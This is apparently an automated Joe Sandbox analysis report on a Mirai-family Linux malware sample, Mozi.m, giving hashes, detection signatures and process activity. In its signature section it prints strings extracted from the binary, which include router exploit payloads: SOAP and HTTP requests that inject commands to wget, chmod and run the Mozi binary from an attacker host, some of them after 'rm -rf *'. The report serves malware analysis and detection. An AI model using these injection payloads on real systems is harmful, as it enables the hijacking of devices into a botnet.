Play interactive tourEdit tour

Linux Analysis Report Mozi.m

Overview

General Information

Sample Name:Mozi.m
Analysis ID:453881
MD5:cebe20a3e4eb38e9e37b995cf0d8f749
SHA1:d1067600848180da20cc89930cac6da18c1ca213
SHA256:db1b04ed7776bef94dbd281789c49ec4830354006f491eeb0e4c8690d7f8e5f9
Infos:

Detection

Mirai
Score:76
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Yara detected Mirai
Yara detected Mirai
Yara detected Mirai
Sample is packed with UPX
Sample contains only a LOAD segment without any section mappings
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings that are potentially command strings
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Analysis Advice

Non-zero exit code suggests an error during the execution. Lookup the error code for hints.
Static ELF header machine description suggests that the sample might not execute correctly on this machine
Static ELF header machine description suggests that the sample might only run correctly on MIPS or ARM architectures

General Information

Joe Sandbox Version:33.0.0 White Diamond
Analysis ID:453881
Start date:25.07.2021
Start time:13:04:29
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 6m 0s
Hypervisor based Inspection enabled:false
Report type:light
Sample file name:Mozi.m
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 59.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)
Analysis Mode:default
Detection:MAL
Classification:mal76.troj.evad.linM@0/2@0/0
Warnings:
  • VT rate limit hit for: http://purenetworks.com/HNAP1/
  • system is lnxubuntu1
  • Mozi.m (PID: 4568, Parent: 4497, MD5: cebe20a3e4eb38e9e37b995cf0d8f749) Arguments: /usr/bin/qemu-mips /tmp/Mozi.m
  • upstart New Fork (PID: 4587, Parent: 3310)
  • sh (PID: 4587, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 4588, Parent: 4587)
    • date (PID: 4588, Parent: 4587, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 4589, Parent: 4587)
    • apport-checkreports (PID: 4589, Parent: 4587, MD5: 1a7d84ebc34df04e55ca3723541f48c9) Arguments: /usr/bin/python3 /usr/share/apport/apport-checkreports --system
  • upstart New Fork (PID: 4614, Parent: 3310)
  • sh (PID: 4614, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 4615, Parent: 4614)
    • date (PID: 4615, Parent: 4614, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 4617, Parent: 4614)
    • apport-gtk (PID: 4617, Parent: 4614, MD5: ec58a49a30ef6a29406a204f28cc7d87) Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk
  • upstart New Fork (PID: 4641, Parent: 3310)
  • sh (PID: 4641, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 4645, Parent: 4641)
    • date (PID: 4645, Parent: 4641, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 4651, Parent: 4641)
    • apport-gtk (PID: 4651, Parent: 4641, MD5: ec58a49a30ef6a29406a204f28cc7d87) Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk
  • cleanup
SourceRuleDescriptionAuthorStrings
Mozi.mSUSP_ELF_LNX_UPX_Compressed_FileDetects a suspicious ELF binary with UPX compressionFlorian Roth
  • 0x20828:$s1: PROT_EXEC|PROT_WRITE failed.
  • 0x20897:$s2: $Id: UPX
  • 0x20848:$s3: $Info: This file is packed with the UPX executable packer
Mozi.mJoeSecurity_Mirai_8Yara detected MiraiJoe Security
    Mozi.mJoeSecurity_Mirai_6Yara detected MiraiJoe Security
      Mozi.mJoeSecurity_Mirai_4Yara detected MiraiJoe Security

        Jbx Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Multi AV Scanner detection for submitted file
        Source: Mozi.mVirustotal: Detection: 47%Perma Link
        Source: Mozi.mReversingLabs: Detection: 39%
        Source: Mozi.mString found in binary or memory: http://%s:%d/Mozi.a;chmod
        Source: Mozi.mString found in binary or memory: http://%s:%d/Mozi.a;sh$
        Source: Mozi.mString found in binary or memory: http://%s:%d/Mozi.m
        Source: Mozi.mString found in binary or memory: http://%s:%d/Mozi.m;
        Source: Mozi.mString found in binary or memory: http://%s:%d/Mozi.m;$
        Source: Mozi.mString found in binary or memory: http://%s:%d/Mozi.m;/tmp/Mozi.m
        Source: Mozi.mString found in binary or memory: http://purenetworks.com/HNAP1/
        Source: Mozi.mString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
        Source: Mozi.mString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
        Source: Mozi.mString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//
        Source: Mozi.mString found in binary or memory: http://upx.sf.net
        Source: LOAD without section mappingsProgram segment: 0x400000
        Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g %s:%d -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: Initial sampleString containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://%s:%d/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>
        Source: Initial samplePotential command found: mv -f
        Source: Initial samplePotential command found: w s"z6
        Source: Initial samplePotential command found: POST /GponForm/diag_?i
        Source: Initial samplePotential command found: GET /Mozi.b HTTP/1.0
        Source: Initial samplePotential command found: GET /Mozi.4 HTTP/1.0
        Source: Initial samplePotential command found: GET /Mozi.k HTTP/1.0
        Source: Initial samplePotential command found: GET /Mozi.l HTTP/1.0
        Source: Initial samplePotential command found: GET /Mozi.p HTTP/1.0
        Source: Initial samplePotential command found: GET /%s HTTP/1.1
        Source: Initial samplePotential command found: POST /%s HTTP/1.1
        Source: Initial samplePotential command found: POST /GponForm/diag_Form?images/ HTTP/1.1
        Source: Initial samplePotential command found: POST /picsdesc.xml HTTP/1.1
        Source: Initial samplePotential command found: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
        Source: Initial samplePotential command found: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
        Source: Initial samplePotential command found: POST /UD/act?1 HTTP/1.1
        Source: Initial samplePotential command found: POST /HNAP1/ HTTP/1.0
        Source: Initial samplePotential command found: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://%s:%d/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
        Source: Initial samplePotential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
        Source: Initial samplePotential command found: POST /soap.cgi?service=WANIPConn1 HTTP/1.1
        Source: Initial samplePotential command found: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://%s:%d/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.m
        Source: Initial samplePotential command found: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron
        Source: Mozi.m, type: SAMPLEMatched rule: SUSP_ELF_LNX_UPX_Compressed_File date = 2018-12-12, author = Florian Roth, description = Detects a suspicious ELF binary with UPX compression, reference = Internal Research, score = 038ff8b2fef16f8ee9d70e6c219c5f380afe1a21761791e8cbda21fa4d09fdb4
        Source: classification engineClassification label: mal76.troj.evad.linM@0/2@0/0

        Data Obfuscation:

        barindex
        Sample is packed with UPX
        Source: initial sampleString containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
        Source: initial sampleString containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
        Source: initial sampleString containing UPX found: $Id: UPX 3.95 Copyright (C) 1996-2018 the UPX Team. All Rights Reserved. $
        Source: /tmp/Mozi.m (PID: 4568)Queries kernel information via 'uname':
        Source: /usr/share/apport/apport-gtk (PID: 4617)Queries kernel information via 'uname':
        Source: /usr/share/apport/apport-gtk (PID: 4651)Queries kernel information via 'uname':

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid AccountsCommand and Scripting Interpreter1Path InterceptionPath InterceptionObfuscated Files or Information1OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumData ObfuscationEavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition

        Malware Configuration

        No configs have been found
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Number of created Files
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 453881 Sample: Mozi.m Startdate: 25/07/2021 Architecture: LINUX Score: 76 26 Multi AV Scanner detection for submitted file 2->26 28 Yara detected Mirai 2->28 30 Yara detected Mirai 2->30 32 2 other signatures 2->32 6 upstart sh 2->6         started        8 upstart sh 2->8         started        10 upstart sh 2->10         started        12 Mozi.m 2->12         started        process3 process4 14 sh date 6->14         started        16 sh apport-checkreports 6->16         started        18 sh date 8->18         started        20 sh apport-gtk 8->20         started        22 sh date 10->22         started        24 sh apport-gtk 10->24         started       
        SourceDetectionScannerLabelLink
        Mozi.m48%VirustotalBrowse
        Mozi.m39%ReversingLabsLinux.Trojan.Skeeyah
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://%s:%d/Mozi.a;sh$0%Avira URL Cloudsafe
        http://%s:%d/Mozi.a;chmod0%Avira URL Cloudsafe
        http://%s:%d/Mozi.m;/tmp/Mozi.m0%Avira URL Cloudsafe
        http://%s:%d/Mozi.m0%Avira URL Cloudsafe
        http://purenetworks.com/HNAP1/0%Avira URL Cloudsafe
        http://%s:%d/Mozi.m;0%Avira URL Cloudsafe
        http://%s:%d/Mozi.m;$0%Avira URL Cloudsafe
        No contacted domains info
        NameSourceMaliciousAntivirus DetectionReputation
        http://upx.sf.netMozi.mfalse
          high
          http://%s:%d/Mozi.a;sh$Mozi.mfalse
          • Avira URL Cloud: safe
          low
          http://%s:%d/Mozi.a;chmodMozi.mfalse
          • Avira URL Cloud: safe
          low
          http://%s:%d/Mozi.m;/tmp/Mozi.mMozi.mtrue
          • Avira URL Cloud: safe
          low
          http://schemas.xmlsoap.org/soap/encoding/Mozi.mfalse
            high
            http://schemas.xmlsoap.org/soap/envelope//Mozi.mfalse
              high
              http://%s:%d/Mozi.mMozi.mtrue
              • Avira URL Cloud: safe
              low
              http://purenetworks.com/HNAP1/Mozi.mfalse
              • Avira URL Cloud: safe
              unknown
              http://%s:%d/Mozi.m;Mozi.mtrue
              • Avira URL Cloud: safe
              low
              http://%s:%d/Mozi.m;$Mozi.mtrue
              • Avira URL Cloud: safe
              low
              http://schemas.xmlsoap.org/soap/envelope/Mozi.mfalse
                high
                No contacted IP infos


                Command:/tmp/Mozi.m
                Exit Code:133
                Exit Code Info:
                Killed:False
                Standard Output:

                Standard Error:qemu: uncaught target signal 5 (Trace/breakpoint trap) - core dumped
                No context
                No context
                No context
                No context
                No context
                /var/crash/_usr_share_apport_apport-checkreports.1000.crash
                Process:/usr/share/apport/apport-checkreports
                File Type:ASCII text
                Category:dropped
                Size (bytes):14915
                Entropy (8bit):4.70703941891471
                Encrypted:false
                SSDEEP:96:mUSUM1S0oLf2NP3CEdU5NAnaMHdMXgIudNPKn/4EJdsPILd4YXrM:mUdONP3CEdKgIuE/4EbsPIhhbM
                MD5:409B9FEF1D6A919E61A71A3F7C7700E9
                SHA1:D6E4DD4CA6129CF522AF9026C29BBF9B3C30A63A
                SHA-256:7BEEF722D67598D7AD747DC73EB5F659C81306A9CAD3FEA3D9804436BB0F6126
                SHA-512:43FB8F0DEFBC735B9DA18D40053A8A586FD25848210F1A0EDC98CED1449F8EB2562DA80D88956CF8D92897A1B1CE2DCF24BAE0CACCA183AFD4246708F0A81FC8
                Malicious:false
                Reputation:low
                Preview: ProblemType: Crash.Date: Sun Jul 25 15:05:03 2021.ExecutablePath: /usr/share/apport/apport-checkreports.ExecutableTimestamp: 1514927430.InterpreterPath: /usr/bin/python3.5.ProcCmdline: /usr/bin/python3 /usr/share/apport/apport-checkreports --system.ProcCwd: /home/user.ProcEnviron:. LANGUAGE=en_US. PATH=(custom, user). XDG_RUNTIME_DIR=<set>. LANG=en_US.UTF-8. SHELL=/bin/bash.ProcMaps:. 00400000-007a9000 r-xp 00000000 fc:00 217 /usr/bin/python3.5. 009a9000-009ab000 r--p 003a9000 fc:00 217 /usr/bin/python3.5. 009ab000-00a42000 rw-p 003ab000 fc:00 217 /usr/bin/python3.5. 00a42000-00a73000 rw-p 00000000 00:00 0 . 0183c000-01b94000 rw-p 00000000 00:00 0 [heap]. 7fd6c712a000-7fd6c72ab000 rw-p 00000000 00:00 0 . 7fd6c72ab000-7fd6c72c2000 r-xp 00000000 fc:00 2382 /usr/lib/x86_64-linux-gnu/liblz4.so.1.7.1. 7fd6c72c2000-7fd6c74c1000 ---p 00017000 fc:0
                /var/crash/_usr_share_apport_apport-gtk.1000.crash
                Process:/usr/share/apport/apport-gtk
                File Type:ASCII text
                Category:dropped
                Size (bytes):47094
                Entropy (8bit):4.499624441689966
                Encrypted:false
                SSDEEP:384:mi9QQ6p1mNoiXZqA/B/m/7/LfJiZC7rJeNAPfUFObYIUioqRxLUeUZFEpF:PqA/B/m/7/IZCXaAPnYSoqRxQeUZFA
                MD5:444D97F3166D74AB937C2CE982EAE6DC
                SHA1:46EA5BDA0D999D1CED9B334C4BED0DCAF750B88D
                SHA-256:B039E88B63E1BD68BE452528A1484858B618B6DE383FF7EDF1A2D08C797CD473
                SHA-512:CC77E11A6A2CF62DC87386826CDBED7ED7F48B2E20F44AC6E9EE0D68AF4F44126A87B849B44F7286200436D23A88C32C473E9AB2395E0B8FA03F8D7D9D709156
                Malicious:false
                Reputation:low
                Preview: ProblemType: Crash.Date: Sun Jul 25 15:05:04 2021.ExecutablePath: /usr/share/apport/apport-gtk.ExecutableTimestamp: 1514927430.InterpreterPath: /usr/bin/python3.5.ProcCmdline: /usr/bin/python3 /usr/share/apport/apport-gtk.ProcCwd: /home/user.ProcEnviron:. LANGUAGE=en_US. PATH=(custom, user). XDG_RUNTIME_DIR=<set>. LANG=en_US.UTF-8. SHELL=/bin/bash.ProcMaps:. 00400000-007a9000 r-xp 00000000 fc:00 217 /usr/bin/python3.5. 009a9000-009ab000 r--p 003a9000 fc:00 217 /usr/bin/python3.5. 009ab000-00a42000 rw-p 003ab000 fc:00 217 /usr/bin/python3.5. 00a42000-00a73000 rw-p 00000000 00:00 0 . 01f73000-02497000 rw-p 00000000 00:00 0 [heap]. 7f6716fca000-7f67170ca000 rw-p 00000000 00:00 0 . 7f67170ca000-7f67170e1000 r-xp 00000000 fc:00 2382 /usr/lib/x86_64-linux-gnu/liblz4.so.1.7.1. 7f67170e1000-7f67172e0000 ---p 00017000 fc:00 2382

                Static File Info

                General

                File type:ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
                Entropy (8bit):4.9371152282277
                TrID:
                • ELF Executable and Linkable format (Linux) (4029/14) 50.16%
                • ELF Executable and Linkable format (generic) (4004/1) 49.84%
                File name:Mozi.m
                File size:307960
                MD5:cebe20a3e4eb38e9e37b995cf0d8f749
                SHA1:d1067600848180da20cc89930cac6da18c1ca213
                SHA256:db1b04ed7776bef94dbd281789c49ec4830354006f491eeb0e4c8690d7f8e5f9
                SHA512:683cd490acbbcd37673f37e1b98f66d2de4af6372cba220a52ff643fe94607b614990e987e24abbd9ad9ed6d2bfcd53a76b4022859f0cac7adebb82254417773
                SSDEEP:3072:phNlHuBafLeBtfCzpta8xlBIOdVo3/4sxLJ10xioo3Q:p3lOYoaja8xzx/0wsxzSiA
                File Content Preview:.ELF.....................B.....4.........4. ...(.............@...@...........................C...C......../..........*.*UPX!.X.....................^....|.$..ELF..........@.`....4...0... ...(......<...@......[v......H...`.t..;_...dt.Q.....].M..............

                ELF header

                Class:ELF32
                Data:2's complement, big endian
                Version:1 (current)
                Machine:MIPS R3000
                Version Number:0x1
                Type:EXEC (Executable file)
                OS/ABI:UNIX - System V
                ABI Version:0
                Entry Point Address:0x4206a8
                Flags:0x1007
                ELF Header Size:52
                Program Header Offset:52
                Program Header Size:32
                Number of Program Headers:2
                Section Header Offset:0
                Section Header Size:40
                Number of Section Headers:0
                Header String Table Index:0
                TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                LOAD0x00x4000000x4000000x210f20x210f24.43370x5R E0x10000
                LOAD0x00x4300000x4300000x00x92fd80.00000x6RW 0x10000

                Network Behavior

                No network behavior found

                System Behavior

                Start time:13:05:03
                Start date:25/07/2021
                Path:/tmp/Mozi.m
                Arguments:/usr/bin/qemu-mips /tmp/Mozi.m
                File size:307960 bytes
                MD5 hash:cebe20a3e4eb38e9e37b995cf0d8f749

                File Activities

                Start time:13:05:03
                Start date:25/07/2021
                Path:/sbin/upstart
                Arguments:n/a
                File size:0 bytes
                MD5 hash:00000000000000000000000000000000
                Start time:13:05:03
                Start date:25/07/2021
                Path:/bin/sh
                Arguments:/bin/sh -e /proc/self/fd/9
                File size:4 bytes
                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                File Activities

                Start time:13:05:03
                Start date:25/07/2021
                Path:/bin/sh
                Arguments:n/a
                File size:4 bytes
                MD5 hash:e02ea3c3450d44126c46d658fa9e654c
                Start time:13:05:03
                Start date:25/07/2021
                Path:/bin/date
                Arguments:date
                File size:68464 bytes
                MD5 hash:54903b613f9019bfca9f5d28a4fff34e

                File Activities

                Start time:13:05:03
                Start date:25/07/2021
                Path:/bin/sh
                Arguments:n/a
                File size:4 bytes
                MD5 hash:e02ea3c3450d44126c46d658fa9e654c
                Start time:13:05:03
                Start date:25/07/2021
                Path:/usr/share/apport/apport-checkreports
                Arguments:/usr/bin/python3 /usr/share/apport/apport-checkreports --system
                File size:1269 bytes
                MD5 hash:1a7d84ebc34df04e55ca3723541f48c9
                Start time:13:05:03
                Start date:25/07/2021
                Path:/sbin/upstart
                Arguments:n/a
                File size:0 bytes
                MD5 hash:00000000000000000000000000000000
                Start time:13:05:03
                Start date:25/07/2021
                Path:/bin/sh
                Arguments:/bin/sh -e /proc/self/fd/9
                File size:4 bytes
                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                File Activities

                Start time:13:05:03
                Start date:25/07/2021
                Path:/bin/sh
                Arguments:n/a
                File size:4 bytes
                MD5 hash:e02ea3c3450d44126c46d658fa9e654c
                Start time:13:05:03
                Start date:25/07/2021
                Path:/bin/date
                Arguments:date
                File size:68464 bytes
                MD5 hash:54903b613f9019bfca9f5d28a4fff34e

                File Activities

                Start time:13:05:03
                Start date:25/07/2021
                Path:/bin/sh
                Arguments:n/a
                File size:4 bytes
                MD5 hash:e02ea3c3450d44126c46d658fa9e654c
                Start time:13:05:03
                Start date:25/07/2021
                Path:/usr/share/apport/apport-gtk
                Arguments:/usr/bin/python3 /usr/share/apport/apport-gtk
                File size:23806 bytes
                MD5 hash:ec58a49a30ef6a29406a204f28cc7d87
                Start time:13:05:04
                Start date:25/07/2021
                Path:/sbin/upstart
                Arguments:n/a
                File size:0 bytes
                MD5 hash:00000000000000000000000000000000
                Start time:13:05:04
                Start date:25/07/2021
                Path:/bin/sh
                Arguments:/bin/sh -e /proc/self/fd/9
                File size:4 bytes
                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                File Activities

                Start time:13:05:04
                Start date:25/07/2021
                Path:/bin/sh
                Arguments:n/a
                File size:4 bytes
                MD5 hash:e02ea3c3450d44126c46d658fa9e654c
                Start time:13:05:04
                Start date:25/07/2021
                Path:/bin/date
                Arguments:date
                File size:68464 bytes
                MD5 hash:54903b613f9019bfca9f5d28a4fff34e

                File Activities

                Start time:13:05:04
                Start date:25/07/2021
                Path:/bin/sh
                Arguments:n/a
                File size:4 bytes
                MD5 hash:e02ea3c3450d44126c46d658fa9e654c
                Start time:13:05:04
                Start date:25/07/2021
                Path:/usr/share/apport/apport-gtk
                Arguments:/usr/bin/python3 /usr/share/apport/apport-gtk
                File size:23806 bytes
                MD5 hash:ec58a49a30ef6a29406a204f28cc7d87